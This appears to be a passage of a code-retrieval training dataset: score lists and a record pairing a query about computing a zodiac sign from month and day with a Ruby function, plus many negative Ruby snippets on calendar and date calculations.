"0.7135922",
"0.6571321",
"0.60677487",
"0.5964015",
"0.5677756",
"0.56502366",
"0.56364274",
"0.55768466",
"0.550457",
"0.546058",
"0.54316163",
"0.54068017",
"0.53350204",
"0.5332118",
"0.5297813",
"0.52955884",
"0.52828133",
"0.52504575",
"0.52006185",
"0.5193434",
"0.51918197",
"0.5191778",
"0.51906675",
"0.51785994",
"0.51739943",
"0.5157118",
"0.5152948",
"0.515202",
"0.5149022",
"0.5142366",
"0.51373583",
"0.51278466",
"0.51267284",
"0.512145",
"0.51112914",
"0.5109776",
"0.5104403",
"0.5101976",
"0.51016784",
"0.50867975",
"0.50806457",
"0.5076257",
"0.50709814",
"0.5066873",
"0.5062742",
"0.5048334",
"0.50386685",
"0.5036816",
"0.5032772",
"0.5028592",
"0.5014982",
"0.501183",
"0.50024366",
"0.49909773",
"0.49802956",
"0.4973311",
"0.4951247",
"0.4947782",
"0.4940625",
"0.4940525",
"0.49371395",
"0.49212813",
"0.49172243",
"0.49030286",
"0.48947304",
"0.48938122",
"0.4885897",
"0.48726007",
"0.48723885",
"0.48723885",
"0.48723885",
"0.48723885",
"0.48711464",
"0.4863277",
"0.48615548",
"0.48612627",
"0.4851907",
"0.4847485",
"0.48467165",
"0.4844845",
"0.4844779",
"0.48417774",
"0.48358777",
"0.483412",
"0.48318237",
"0.48312318",
"0.48311037",
"0.48234314",
"0.48229206",
"0.48189187",
"0.48189187",
"0.48130935",
"0.4810872",
"0.48084563",
"0.48069015",
"0.48049214",
"0.4804682",
"0.48023558",
"0.48023558",
"0.4800948"
] | 0.72937435 | 0 |
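Each record in this dump follows the column order query | document | metadata | negatives | negative_scores | document_score | document_rank, and the metadata's "triplet" objective pairs the query and document against each negative. The sketch below shows one plausible way a consumer could hold a parsed record and expand it into training triplets; RetrievalRow and triplets are hypothetical names, not part of the dataset, and real parsing would also need to handle " | " occurring inside cell text.

# A minimal sketch, assuming the column order shown in this dump.
RetrievalRow = Struct.new(:query, :document, :metadata,
                          :negatives, :negative_scores,
                          :document_score, :document_rank)

def triplets(row)
  # One (query, document, negative) triplet per negative, mirroring
  # the "triplet" objective declared in each record's metadata.
  row.negatives.map { |negative| [row.query, row.document, negative] }
end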
Calculates the zodiac sign based on the given month and day: 0 is Aries, 11 is Pisces. Month is 1 if January, and so on. | def zodiac(month,day)
time = [
3,21,4,19, # Aries
4,20,5,20, # Taurus
5,21,6,20, # Gemini
6,21,7,20, # Cancer
7,23,8,22, # Leo
8,23,9,22, # Virgo
9,23,10,22, # Libra
10,23,11,21, # Scorpio
11,22,12,21, # Sagittarius
12,22,1,19, # Capricorn
1,20,2,18, # Aquarius
2,19,3,20 # Pisces
]
for i in 0...12
return i if month==time[i*4] && day>=time[i*4+1]
return i if month==time[i*4+2] && day<=time[i*4+3]
end
return 0
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def zodiac(month,day)\n time=[\n 1,1,1,31, # The Apprentice\n 2,1,2,28, # The Companion\n 3,1,3,31, # The Beacon\n 4,1,4,30, # The Savage\n 5,1,5,31, # The Prodigy\n 6,1,6,30, # The Martyr\n 7,1,7,31, # The Maiden\n 8,1,8,31, # The Gladiator\n 9,1,9,30, # The Voyager\n 10,1,10,31, # The Thief\n 11,1,11,30, # The Glutton\n 12,1,12,31 # The Wishmaker\n ]\n for i in 0...12\n return i if month==time[i*4] && day>=time[i*4+1]\n return i if month==time[i*4+2] && day<=time[i*4+2]\n end\n return 0\nend",
"def zodiacValue(sign)\n return (sign)%12\nend",
"def zodiacOpposite(sign)\n return (sign+6)%12\nend",
"def zodiacOpposite(sign)\n return (sign+6)%12\nend",
"def absolute_day(month, day)\n\n mo = {\n 1 => 31,\n 2 => 28,\n 3 => 31,\n 4 => 30,\n 5 => 31,\n 6 => 30,\n 7 => 31,\n 8 => 31,\n 9 => 30,\n 10 => 31,\n 11 => 30,\n 12 => 31,\n }\n\n # hash v. loop of arrays, computation v. memory tradeoff\n\n total_days = 0\n\n\n (1...month).each do |i| #1...month is (month-1)\n total_days += mo[i]\n end\n\n total_days + day\n\nend",
"def ord(day)\n\nend",
"def ides_of_month(month)\n [MARCH, MAY, JULY, OCTOBER].include?(month) ? 15 : 13\n end",
"def zodiacComplements(sign)\n return [(sign+1)%12,(sign+11)%12]\nend",
"def zodiacComplements(sign)\n return [(sign+1)%12,(sign+11)%12]\nend",
"def monthDays(y, m)\n if ((@@lunar_info[y - 1900] & (0x10000 >> m)) == 0)\n return 29\n else\n return 30\n end\n end",
"def daysinmonth(year, month)\n return (Date.new(year, 12, 31) << (12-month)).day\n end",
"def daysinmonth(year, month)\n return (Date.new(year, 12, 31) << (12-month)).day\n end",
"def julian(year, month, day)\n a = (14 - month) / 12\n y = year + 4800 - a\n m = (12 * a) - 3 + month\n day + (153 * m + 2) / 5 + (365 * y) + y / 4 - y / 100 + y / 400 - 32_045\nend",
"def monthly_dry_days(day)\n month_result_string(day).count('1')\n end",
"def zodiacPartners(sign)\n return [(sign+4)%12,(sign+8)%12]\nend",
"def zodiacPartners(sign)\n return [(sign+4)%12,(sign+8)%12]\nend",
"def days_in_month(month=nil)\n month ||= Date.today.month\n days_in_mon = Date.civil(Date.today.year, month, -1).day\n end",
"def days_in_month(year, month)\n (Date.new(year, 12, 31) << (12-month)).day\n end",
"def days_in_month(year, month)\n Date.new(year, month, -1).day\n end",
"def day_in_month(year, month, day)\n return Date.new(year, month, day).wday\n end",
"def day_of_month\n ordinal = case @time.day\n when 1 then \"st\"\n when 2 then \"nd\"\n when 3 then \"rd\"\n else \"th\"\n end\n \"#{@time.day}#{ordinal}\"\n end",
"def yday\n m = (@month-2 < 0) ? 0 : @month-2\n (@month==1) ? @day : @day + JDaysInMonth[0..m].inject(0) {|sum, n| sum + n }\n end",
"def days_in_month(year, month)\n return (Date.new(year, 12, 31) << (12 - month)).day\n end",
"def days_in_month(month, year = Time.now.year)\n return 29 if month == 2 && Date.gregorian_leap?(year)\n DAYS_IN_MONTH[month]\n end",
"def days_in_month(month, year = Time.now.year)\n return 29 if month == 2 && Date.gregorian_leap?(year)\n DAYS_IN_MONTH[month]\n end",
"def count_of_days_in(month)\n 28 + (month + (month / 8)) % 2 + 2 % month + 2 * (1 / month)\nend",
"def get_days_month(date=nil)\n date ||= @date\n\n return @schedule.days if @schedule.days > 0\n\n if @schedule.days_month != 'specific'\n if @schedule.days_month == 'last' && @schedule.days_month_day == nil\n return 0b0 | (1 << date.at_end_of_month.day)\n end\n end\n\n return 0b0 | (1 << @schedule.start_date.day)\n end",
"def day_of_month\n return self.day_of_year if self.month == 1\n ((self.day_of_year - 1) - DAYS_IN_MONTH.slice(0, (month - 1)).inject(:+)) + 1\n end",
"def days_in_month(month, year = Time.now.year)\n\t return 29 if month == 2 && Date.gregorian_leap?(year)\n\t return COMMON_YEAR_DAYS_IN_MONTH[month]\n\tend",
"def find_day_of_month(day=@day, first_day_of_month=@first_day_of_month)\r\n day = ((day - 1) + first_day_of_month) % 7\r\n return 7 if day == 0\r\n day\r\n end",
"def daySymbol\n dayNum = 30*(@month - 1) + (@day - 1)\n symbols = [\"Raisin (Grape)\",\n \"Safran (Saffron)\",\n \"Châtaigne (Chestnut)\",\n \"Colchique (Crocus)\",\n \"Cheval (Horse)\",\n \"Balsamine (Impatiens)\",\n \"Carotte (Carrot)\",\n \"Amarante (Amaranth)\",\n \"Panais (Parsnip)\",\n \"Cuve (Vat)\",\n \"Pomme de terre (Potato)\",\n \"Immortelle (Strawflower)\",\n \"Potiron (Calabaza)\",\n \"Réséda (Mignonette)\",\n \"Âne (Donkey)\",\n \"Belle de nuit (The four o’clock flower)\",\n \"Citrouille (Pumpkin)\",\n \"Sarrasin (Buckwheat)\",\n \"Tournesol (Sunflower)\",\n \"Pressoir (Wine-Press)\",\n \"Chanvre (Hemp)\",\n \"Pêche (Peach)\",\n \"Navet (Turnip)\",\n \"Amaryllis (Amaryllis)\",\n \"Bœuf (Cow)\",\n \"Aubergine (Eggplant)\",\n \"Piment (Chili Pepper)\",\n \"Tomate (Tomato)\",\n \"Orge (Barley)\",\n \"Tonneau (Barrel)\",\n \"Pomme (Apple)\",\n \"Céleri (Celery)\",\n \"Poire (Pear)\",\n \"Betterave (Beet root)\",\n \"Oie (Goose)\",\n \"Héliotrope (Heliotrope)\",\n \"Figue (Fig)\",\n \"Scorsonère (Black Salsify)\",\n \"Alisier (Chequer Tree)\",\n \"Charrue (Plough)\",\n \"Salsifis (Salsify)\",\n \"Macre (Water chestnut)\",\n \"Topinambour (Jerusalem Artichoke)\",\n \"Endive (Endive)\",\n \"Dindon (Turkey)\",\n \"Chervis (Skirret)\",\n \"Cresson (Watercress)\",\n \"Dentelaire (Leadworts)\",\n \"Grenade (Pomegranate)\",\n \"Herse (Harrow)\",\n \"Bacchante (Asarum baccharis)\",\n \"Azerole (Acerola)\",\n \"Garance (Madder)\",\n \"Orange (Orange)\",\n \"Faisan (Pheasant)\",\n \"Pistache (Pistachio)\",\n \"Macjonc (Tuberous pea)\",\n \"Coing (Quince)\",\n \"Cormier (Service tree)\",\n \"Rouleau (Roller)\",\n \"Raiponce (Rampion)\",\n \"Turneps (Turnip)\",\n \"Chicorée (Chicory)\",\n \"Nèfle (Medlar)\",\n \"Cochon (Pig)\",\n \"Mâche (Corn Salad)\",\n \"Chou-fleur (Cauliflower)\",\n \"Miel (Honey)\",\n \"Genièvre (Juniper)\",\n \"Pioche (Pickaxe)\",\n \"Cire (Wax)\",\n \"Raifort (Horseradish)\",\n \"Cèdre (Cedar tree)\",\n \"Sapin (Fir tree)\",\n \"Chevreuil (Roe Deer)\",\n \"Ajonc (Gorse)\",\n \"Cyprès (Cypress Tree)\",\n \"Lierre (Ivy)\",\n \"Sabine (Juniper)\",\n \"Hoyau (Grub-hoe)\",\n \"Érable sucré (Maple Tree)\",\n \"Bruyère (Heather)\",\n \"Roseau (Reed plant)\",\n \"Oseille (Sorrel)\",\n \"Grillon (Cricket)\",\n \"Pignon (Pinenut)\",\n \"Liège (cork)\",\n \"Truffe (Truffle)\",\n \"Olive (Olive)\",\n \"Pelle (shovel)\",\n \"Tourbe (Peat)\",\n \"Houille (Coal)\",\n \"Bitume (Bitumen)\",\n \"Soufre (Sulphur)\",\n \"Chien (Dog)\",\n \"Lave (Lava)\",\n \"Terre végétale (Topsoil)\",\n \"Fumier (Manure)\",\n \"Salpêtre (Saltpeter)\",\n \"Fléau (Flail)\",\n \"Granit (Granite stone)\",\n \"Argile (Clay)\",\n \"Ardoise (Slate)\",\n \"Grès (Sandstone)\",\n \"Lapin (Rabbit)\",\n \"Silex (Flint)\",\n \"Marne (Marl)\",\n \"Pierre à chaux (Limestone)\",\n \"Marbre (Marble)\",\n \"Van (Winnowing basket)\",\n \"Pierre à plâtre (Gypsum)\",\n \"Sel (Salt)\",\n \"Fer (Iron)\",\n \"Cuivre (Copper)\",\n \"Chat (Cat)\",\n \"Étain (Tin)\",\n \"Plomb (Lead)\",\n \"Zinc (Zinc)\",\n \"Mercure (Mercury (metal))\",\n \"Crible (Sieve)\",\n \"Lauréole (Spurge-laurel)\",\n \"Mousse (Moss)\",\n \"Fragon (Butcher’s Broom)\",\n \"Perce-neige (Snowdrop)\",\n \"Taureau (Bull)\",\n \"Laurier-thym (Laurustinus)\",\n \"Amadouvier (Tinder polypore)\",\n \"Mézéréon (Daphne mezereum)\",\n \"Peuplier (Poplar Tree)\",\n \"Coignée (Axe)\",\n \"Ellébore (Hellebore)\",\n \"Brocoli (Broccoli)\",\n \"Laurier (Laurel)\",\n \"Avelinier (Cob or filbert)\",\n \"Vache (Cow)\",\n \"Buis (Box Tree)\",\n \"Lichen (Lichen)\",\n \"If 
(Yew tree)\",\n \"Pulmonaire (Lungwort)\",\n \"Serpette (Billhook)\",\n \"Thlaspi (Pennycress)\",\n \"Thimelé (Rose Daphne)\",\n \"Chiendent (Couch Grass)\",\n \"Trainasse (Knotweed)\",\n \"Lièvre (Hare)\",\n \"Guède (Woad)\",\n \"Noisetier (Hazel)\",\n \"Cyclamen (Cyclamen)\",\n \"Chélidoine (Celandine)\",\n \"Traîneau (Sleigh)\",\n \"Tussilage (Coltsfoot)\",\n \"Cornouiller (Dogwood)\",\n \"Violier (Matthiola)\",\n \"Troène (Privet)\",\n \"Bouc (Billygoat)\",\n \"Asaret (Wild Ginger)\",\n \"Alaterne (Buckthorn)\",\n \"Violette (Violet (plant))\",\n \"Marceau (Goat Willow)\",\n \"Bêche (Spade)\",\n \"Narcisse (Narcissus)\",\n \"Orme (Elm Tree)\",\n \"Fumeterre (Common fumitory)\",\n \"Vélar (Hedge Mustard)\",\n \"Chèvre (Goat)\",\n \"Épinard (Spinach)\",\n \"Doronic (Large-flowered Leopard’s Bane)\",\n \"Mouron (Pimpernel)\",\n \"Cerfeuil (Chervil)\",\n \"Cordeau (Twine)\",\n \"Mandragore (Mandrake)\",\n \"Persil (Parsley)\",\n \"Cochléaria (Scurvy-grass)\",\n \"Pâquerette (Daisy)\",\n \"Thon (Tuna)\",\n \"Pissenlit (Dandelion)\",\n \"Sylve (Forest)\",\n \"Capillaire (Maidenhair fern)\",\n \"Frêne (Ash Tree)\",\n \"Plantoir (Dibber: a hand gardening tool)\",\n \"Primevère (Primrose)\",\n \"Platane (Plane Tree)\",\n \"Asperge (Asparagus)\",\n \"Tulipe (Tulip)\",\n \"Poule (Hen)\",\n \"Bette (Chard Plant)\",\n \"Bouleau (Birch Tree)\",\n \"Jonquille (Daffodil)\",\n \"Aulne (Alder)\",\n \"Couvoir (Hatchery)\",\n \"Pervenche (Periwinkle)\",\n \"Charme (Ironwood)\",\n \"Morille (Morel)\",\n \"Hêtre (Beech Tree)\",\n \"Abeille (Bee)\",\n \"Laitue (Lettuce)\",\n \"Mélèze (Larch)\",\n \"Ciguë (Hemlock)\",\n \"Radis (Radish)\",\n \"Ruche (Hive)\",\n \"Gainier (Judas tree)\",\n \"Romaine (Lettuce)\",\n \"Marronnier (Chestnut Oak)\",\n \"Roquette (Arugula or Rocket)\",\n \"Pigeon (Pigeon)\",\n \"Lilas (Lilac)\",\n \"Anémone (Anemone)\",\n \"Pensée (Pansy)\",\n \"Myrtille (Blueberry)\",\n \"Greffoir (Knife)\",\n \"Rose (Rose)\",\n \"Chêne (Oak Tree)\",\n \"Fougère (Fern)\",\n \"Aubépine (Hawthorn)\",\n \"Rossignol (Nightingale)\",\n \"Ancolie (Columbine)\",\n \"Muguet (Lily of the Valley)\",\n \"Champignon (Button mushroom)\",\n \"Hyacinthe (Hyacinth)\",\n \"Râteau (Rake)\",\n \"Rhubarbe (Rhubarb)\",\n \"Sainfoin (Sainfoin)\",\n \"Bâton-d’or (Wallflower)\",\n \"Chamérops (Palm tree)\",\n \"Ver à soie (Silkworm)\",\n \"Consoude (Comfrey)\",\n \"Pimprenelle (Salad Burnet)\",\n \"Corbeille d’or (Basket of Gold)\",\n \"Arroche (Orache)\",\n \"Sarcloir (Garden hoe)\",\n \"Statice (Sea Lavender)\",\n \"Fritillaire (Fritillary)\",\n \"Bourrache (Borage)\",\n \"Valériane (Valerian)\",\n \"Carpe (Carp)\",\n \"Fusain (Spindle (shrub))\",\n \"Civette (Chive)\",\n \"Buglosse (Bugloss)\",\n \"Sénevé (Wild mustard)\",\n \"Houlette (Shepherd’s crook)\",\n \"Luzerne (Alfalfa)\",\n \"Hémérocalle (Daylily)\",\n \"Trèfle (Clover)\",\n \"Angélique (Angelica)\",\n \"Canard (Duck)\",\n \"Mélisse (Lemon Balm)\",\n \"Fromental (Oat grass)\",\n \"Martagon (Martagon lily)\",\n \"Serpolet (Thyme plant)\",\n \"Faux (Scythe)\",\n \"Fraise (Strawberry)\",\n \"Bétoine (Woundwort)\",\n \"Pois (Pea)\",\n \"Acacia (Acacia)\",\n \"Caille (Quail)\",\n \"Œillet (Carnation)\",\n \"Sureau (Elderberry)\",\n \"Pavot (Poppy plant)\",\n \"Tilleul (Linden or Lime tree)\",\n \"Fourche (Pitchfork)\",\n \"Barbeau (Cornflower)\",\n \"Camomille (Camomile)\",\n \"Chèvrefeuille (Honeysuckle)\",\n \"caille-lait (Bedstraw)\",\n \"Tanche (Tench)\",\n \"Jasmin (Jasmine Plant)\",\n \"Verveine (Verbena)\",\n \"Thym (Thyme Plant)\",\n \"Pivoine (Peony 
Plant)\",\n \"Chariot (Hand Cart)\",\n \"Seigle (Rye)\",\n \"Avoine (Oats)\",\n \"Oignon (Onion)\",\n \"Véronique (Speedwell)\",\n \"Mulet (Mule)\",\n \"Romarin (Rosemary)\",\n \"Concombre (Cucumber)\",\n \"Échalote (Shallot)\",\n \"Absinthe (Wormwood)\",\n \"Faucille (Sickle)\",\n \"Coriandre (Coriander)\",\n \"Artichaut (Artichoke)\",\n \"Girofle (Clove)\",\n \"Lavande (Lavender)\",\n \"Chamois (Chamois)\",\n \"Tabac (Tobacco)\",\n \"Groseille (Currant)\",\n \"Gesse (Hairy Vetchling)\",\n \"Cerise (Cherry)\",\n \"Parc (Park)\",\n \"Menthe (Mint)\",\n \"Cumin (Cumin)\",\n \"Haricot (Bean)\",\n \"Orcanète (Alkanet)\",\n \"Pintade (Guinea fowl)\",\n \"Sauge (Sage Plant)\",\n \"Ail (Garlic)\",\n \"Vesce (Tare)\",\n \"Blé (Wheat)\",\n \"Chalémie (Shawm)\",\n \"Épeautre (Einkorn Wheat)\",\n \"Bouillon blanc (Common Mullein)\",\n \"Melon (Honeydew Melon)\",\n \"Ivraie (Ryegrass)\",\n \"Bélier (Ram)\",\n \"Prêle (Horsetail)\",\n \"Armoise (Mugwort)\",\n \"Carthame (Safflower)\",\n \"Mûre (Blackberry)\",\n \"Arrosoir (Watering Can)\",\n \"Panis (Panic grass)\",\n \"Salicorne (Common Glasswort)\",\n \"Abricot (Apricot)\",\n \"Basilic (Basil)\",\n \"Brebis (Ewe)\",\n \"Guimauve (Marshmallow root)\",\n \"Lin (Flax)\",\n \"Amande (Almond)\",\n \"Gentiane (Gentian)\",\n \"Écluse (Lock)\",\n \"Carline (Carline thistle)\",\n \"Câprier (Caper)\",\n \"Lentille (Lentil)\",\n \"Aunée (Yellow starwort)\",\n \"Loutre (Otter)\",\n \"Myrte (Myrtle)\",\n \"Colza (Rapeseed)\",\n \"Lupin (Lupin)\",\n \"Coton (Cotton)\",\n \"Moulin (Mill)\",\n \"Prune (Plum)\",\n \"Millet (Millet)\",\n \"Lycoperdon (Puffball)\",\n \"Escourgeon (Six-row Barley)\",\n \"Saumon (Salmon)\",\n \"Tubéreuse (Tuberose)\",\n \"Sucrion (Sugar melon)\",\n \"Apocyn (Apocynum)\",\n \"Réglisse (Liquorice)\",\n \"Échelle (Ladder)\",\n \"Pastèque (Watermelon)\",\n \"Fenouil (Fennel)\",\n \"Épine vinette (Barberry)\",\n \"Noix (Walnut)\",\n \"Truite (Trout)\",\n \"Citron (Lemon)\",\n \"Cardère (Teasel)\",\n \"Nerprun (Buckthorn)\",\n \"Tagette (Mexican Marigold)\",\n \"Hotte (Sack)\",\n \"Églantine (Wild Rose)\",\n \"Noisette (Hazelnut)\",\n \"Houblon (Hops)\",\n \"Sorgho (Sorghum)\",\n \"Écrevisse (Crayfish)\",\n \"Bigarade (Bitter Orange)\",\n \"Verge d’or (Goldenrod)\",\n \"Maïs (Maize or Corn)\",\n \"Marron (Chestnut)\",\n \"Panier (Basket)\",\n \"La Fête de la Vertu (Celebration of Virtue)\",\n \"La Fête du Génie (Celebration of Talent)\",\n \"La Fête du Travail (Celebration of Labour)\",\n \"La Fête de l'Opinion (Celebration of Principles)\",\n \"La Fête des Récompenses (Celebration of Honours)\",\n \"La Fête de la Révolution (Celebration of the Revolution)\"]\n return symbols[dayNum]\n end",
"def days_in_month(month, year = current.year)\n if month == 2 && ::Date.gregorian_leap?(year)\n 29\n else\n COMMON_YEAR_DAYS_IN_MONTH[month]\n end\n end",
"def nones_of_month(month)\n ides_of_month(month) - 8\n end",
"def dec_Sun() \r\n asin( sin(Celes.nut06a(@ajd, 0)[ 1 ] + Celes.obl06(@ajd, 0)) * \r\n sin( al(@ma, @ta, Celes.faom03(@ta)))) \r\n end",
"def atomize_ordinal(year, day, separator, sign)\n date = parse([year, day].join('-'))\n sign = \"#{sign}1\".to_i\n @separator = separator\n\n [sign * date.year, date.month, date.day]\n end",
"def month_result_string(day)\n start = day.beginning_of_month.yday - 1\n finish = day.end_of_month.yday - 1\n result_string(day.year).slice(start..finish)\n end",
"def days_in_month(month, year)\n (month == 2 && is_leap_year?(year)) ? 29 : DAYS_IN_A_MONTH[month]\n end",
"def inspect\n \"the day of the month is the \" +\n ordinal_list(@days)\n end",
"def month() end",
"def roman_month(date)\n date[1]\n end",
"def date_parse raw_day, raw_month\n str_month = raw_month.scan(@regex_monthes)[0]\n month = @monthes[str_month]\n return if not month\n day = raw_day.to_i\n return if day==0\n today = Date.today\n if day < today.day and month == 12\n year = today.year + 1\n else\n year = today.year\n end\n #puts year, year.class, month, month.class, day, day.class\n return \"#{year}-#{\"%02d\"%month}-#{\"%02d\"%day}\"\nend",
"def days_in_month\n raw = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31][self.month]\n self.month == 2 && leap_year? ? raw + 1 : raw\n end",
"def nwday_of_month(n)\n self + (nwday_day(n) - day).days\n end",
"def add_days(year, month, day , offest )\n\n\n\t### From Hijri to Julian to Gregorian date \n\n\tgd = fromjdtog(islamictojd(year.to_i, month.to_i, day.to_i))\n\n\t### Add months to Gregorian date \n\n\tparsed_date = Date.new( gd[0] , gd[1] , gd[2]) \n\n\tgd_after_add = parsed_date + offest\n\n\tgd_after_add = gd_after_add.to_s(:db)\n\n\t### From Gregorian to Julian to Hijri date \t\n\n\thd_after_add = fromjdtoislamic(gtojd(gd_after_add[0,4].to_i,gd_after_add[5,2].to_i,gd_after_add[8,2].to_i))\n\n\t## Return Hijri date \n\n\t#return year.to_s + '-' + month.to_s + '-' + day.to_s + ' بعد اضافة ' + offest.to_s + ' شهر ' + hd_after_add.to_s\n\n\treturn hd_after_add\n\nend",
"def julian_to_merch(month)\n date_calc.julian_to_merch(month)\n end",
"def mday() end",
"def dob_mapping(month, day, year)\n month_arr = %w(January February March April May June July August September October November December)\n m_str = ((month_arr.index month) + 1).to_s\n m = (m_str.length > 1) ? m_str : '0' + m_str\n d = (day.length > 1) ? day : '0' + day\n y = year\n\n y + '-' + m + '-' + d\n end",
"def user_input_to_zodiac(input)\n zodiac_sign = ''\n dates = []\n Zodiac.all_dates.each do |date_array|\n if Date.parse(input).between?(Date.parse(date_array[0]), Date.parse(date_array[1]))\n dates = date_array\n end\n end\n Zodiac.all.each do |zodiac|\n if zodiac.sun_dates == dates\n @zodiac = zodiac\n elsif Date.parse(input).between?(Date.parse(\"12/22\"), Date.parse(\"12/31\")) || Date.parse(input).between?(Date.parse(\"01/01\"), Date.parse(\"01/19\"))\n @zodiac = Zodiac.all.find{|zodiac| zodiac.name == \"Capricorn\"}\n end\n end\n @zodiac\n end",
"def days_in_month\n Time.send(\"month_days\", self.year, self.month)\n end",
"def day_number_of_the_year day, month, hash \n if month > 1\n for i in 1...month\n day += hash[i]\n end\n end\n day\nend",
"def day_of_month(*days)\n merge(mday: days)\n end",
"def ma_Sun()\r\n @ta = ( @ajd - DJ00 ) / DJC \r\n# @ma = delta_equinox()[2]\r\n @ma = Celes.falp03(@ta) \r\n end",
"def merch_to_julian(month)\n date_calc.merch_to_julian(month)\n end",
"def gregorian2absolute(day, month, year)\n # # Computes the absolute date from the Gregorian date.\n @d = day\n @m = month - 1\n @m.downto(1) do |m|\n @d += last_day_of_gregorian_month(@m, year)\n end\n return (@d + 365 * (year - 1) + (year -1) / 4.0 - (year - 1) / 100.0 + (year - 1) / 400.0).to_i\n end",
"def month\n @month ||= date_calc.merch_to_julian(merch_month)\n end",
"def lunar_date(year, month, day)\n l = yang_to_nong(year, month, day)\n l[0].to_s + '-' + l[1].to_s + '-' + (/^\\d+/.match(l[2].to_s)).to_s\n end",
"def first_day(month)\n m = set_month(month)\n q = 1\n y = set_year(month)\n h = (q + (((m+1) * 26)/10) + y + (y/4) + (6 * (y/100)) + (y/400)) % 7\n end",
"def days_in_month(month, year)\n days_per_month = { 1 => 31, 2 => 28 + (leap?(year) ? 1 : 0), 3 => 31, 4 => 30, 5 => 31, 6 => 30, 7 => 31, 8 => 31, 9 => 30, 10 => 31, 11 => 30, 12 => 31 } \n if (month == 0)\n return days_per_month[12]\n elsif (month < 0)\n return days_per_month[month % 13]\n else\n return days_per_month[month] \n end\n end",
"def nights_left_in_a_month(day,month,year)\n\n nights_left = days_in_month(month,year) - day \n return nights_left\n\nend",
"def day(date)\n [date.day.ordinalize.to_s, month(date)].join(' ')\n end",
"def fromjdtoislamic(jd)\n\n\tjd = (jd).floor + 0.5\n\n\tyear = ((30 * (jd - $jdepoch) + 10646) / 10631).floor\n\n\t#year = (year <= 0 ? year - 1 : year)\n\n\tif ( year < 0 )\n\n\t\tyear = -1\n\n\tend\n\n\tmonth = [12, ((jd - 29 - islamictojd(year, 1, 1)) / 29.5).ceil + 1].min\n\n\tday = (jd - islamictojd(year, month, 1) + 1).to_i\n\n\treturn year, month, day\n\nend",
"def calc_days_in_month month, year\n months_with_30 = [4, 6, 9, 11]\n months_with_31 = [1, 3, 5, 7, 8, 10, 12]\n if months_with_30.include? month\n 30\n elsif months_with_31.include? month\n 31\n elsif (year % 4 == 0) && !(year % 100 == 0) || (year % 400 == 0)\n 29\n else\n 28\n end\n end",
"def day() end",
"def inspect\n \"the day of the month is the \" + ordinal_list(@parts)\n end",
"def roman_from_fixed(f_date)\n j_date = julian_from_fixed(f_date)\n month = standard_month(j_date)\n day = standard_day(j_date)\n year = standard_year(j_date)\n month_prime = amod(1 + month, 12)\n year_prime = (if month_prime != 1\n year\n elsif year != -1\n year + 1\n else\n 1\n end)\n kalends1 = fixed_from_roman(roman_date(year_prime, month_prime, KALENDS, 1, False))\n\n res = if day == 1\n roman_date(year, month, KALENDS, 1, False)\n elsif day <= nones_of_month(month):\n roman_date(year, month, NONES, nones_of_month(month)-day+1, False)\n elsif day <= ides_of_month(month):\n roman_date(year, month, IDES, ides_of_month(month)-day+1, False)\n elsif (month <> FEBRUARY) or not is_julian_leap_year(year):\n roman_date(year_prime, month_prime, KALENDS, kalends1 - date + 1, False)\n elsif day < 25:\n roman_date(year, MARCH, KALENDS, 30 - day, False)\n else\n roman_date(year, MARCH, KALENDS, 31 - day, day == 25)\n end\n return res\n end",
"def ordinalDate\n ordinal = DAYS_THUS_FAR[@month].to_i + @day.to_i\n if leapYear? && @month > 2\n ordinal = ordinal + 1\n end\n return ordinal\n end",
"def getDate(day, month, year)\n day << @day\n month << @month\n year << @year\n end",
"def days_in_current_month\n\t\t\tcurrent_month = Time.now.month\n\t\t\tcurrent_year = Time.now.year\n\n\t\t\treturn Time.days_in_month(current_month, current_year)\n\t\tend",
"def card_month\n card[:month].to_i\n end",
"def mday\n end",
"def rsmonth(month)\n case month\n when 1\n return 'januar'\n when 2\n return 'februar'\n when 3\n return 'mart'\n when 4\n return 'april'\n when 5\n return 'maj'\n when 6\n return 'jun'\n when 7\n return 'jul'\n when 8\n return 'avgust'\n when 9\n return 'septembar'\n when 10\n return 'oktobar'\n when 11\n return 'novembar'\n when 12\n return 'decembar'\n end\nend",
"def day_of_month(days, *extras)\n merge(mday: days.array_concat(extras))\n end",
"def nth_negative_instance_of_day_in_month(date)\n # How many days are there in this month? We'll grab the first of next month, then roll\n # back a day to see.\n next_month = Time.utc(date.year, (date.month % 12) + 1)\n next_month = Time.utc(next_month.year + 1, next_month.month) if next_month < date\n month_days = (next_month - 86400).day\n return -1 - ((month_days - date.day) / 7)\n end",
"def dmonth(delta=0)\n ty = Time.now.utc\n m1 = 1 + (ty.month + delta - 1) % 12\n y1 = ty.year + (ty.month + delta - 1) / 12\n m2 = 1 + (ty.month + delta) % 12\n y2 = ty.year + (ty.month + delta) / 12\n puts m1, y1, m2, y2\n {\n :from => Time.utc(y1,m1),\n :to => Time.utc(y2,m2)\n }\n end",
"def days_until_xmas(date)\n return 0\nend",
"def month; end",
"def month; end",
"def statement_day_ordinal\n return '' if statement_day.nil?\n statement_day.ordinalize\n end",
"def yday() end",
"def islamictojd(year, month, day)\n\n\t#\tyear = (year <= 0 ? year + 1 : year)\n\n\tif ( year < 0 )\n\n\t\tyear = 1\n\n\tend\n\n\treturn day + (29.5 * (month - 1)).ceil + (year - 1) * 354 + ((3 + (11 * year)) / 30).floor + $jdepoch - 1\n\nend",
"def iffer(day,month)\n if month == 2 && day == 29\n return true\n else\n return false\n end\nend",
"def year_and_month_to_int(year, month)\n (year * 12) + (month - 1)\n end",
"def days_in_month\n @date_time_value.days_in_month\n end",
"def add_months(year, month, day , offest )\n\n\n\t### From Hijri to Julian to Gregorian date \n\n\tgd = fromjdtog(islamictojd(year.to_i, month.to_i, day.to_i))\n\n\t### Add months to Gregorian date \n\n\tparsed_date = Date.new( gd[0] , gd[1] , gd[2]) \n\n\tgd_after_add = parsed_date.months_since(offest)\n\n\tgd_after_add = gd_after_add.to_s(:db)\n\n\t### From Gregorian to Julian to Hijri date \t\n\n\thd_after_add = fromjdtoislamic(gtojd(gd_after_add[0,4].to_i,gd_after_add[5,2].to_i,gd_after_add[8,2].to_i))\n\n\t## Return Hijri date \n\n\t#return year.to_s + '-' + month.to_s + '-' + day.to_s + ' بعد اضافة ' + offest.to_s + ' شهر ' + hd_after_add.to_s\n\n\treturn hd_after_add\n\nend",
"def months() 30 * days end",
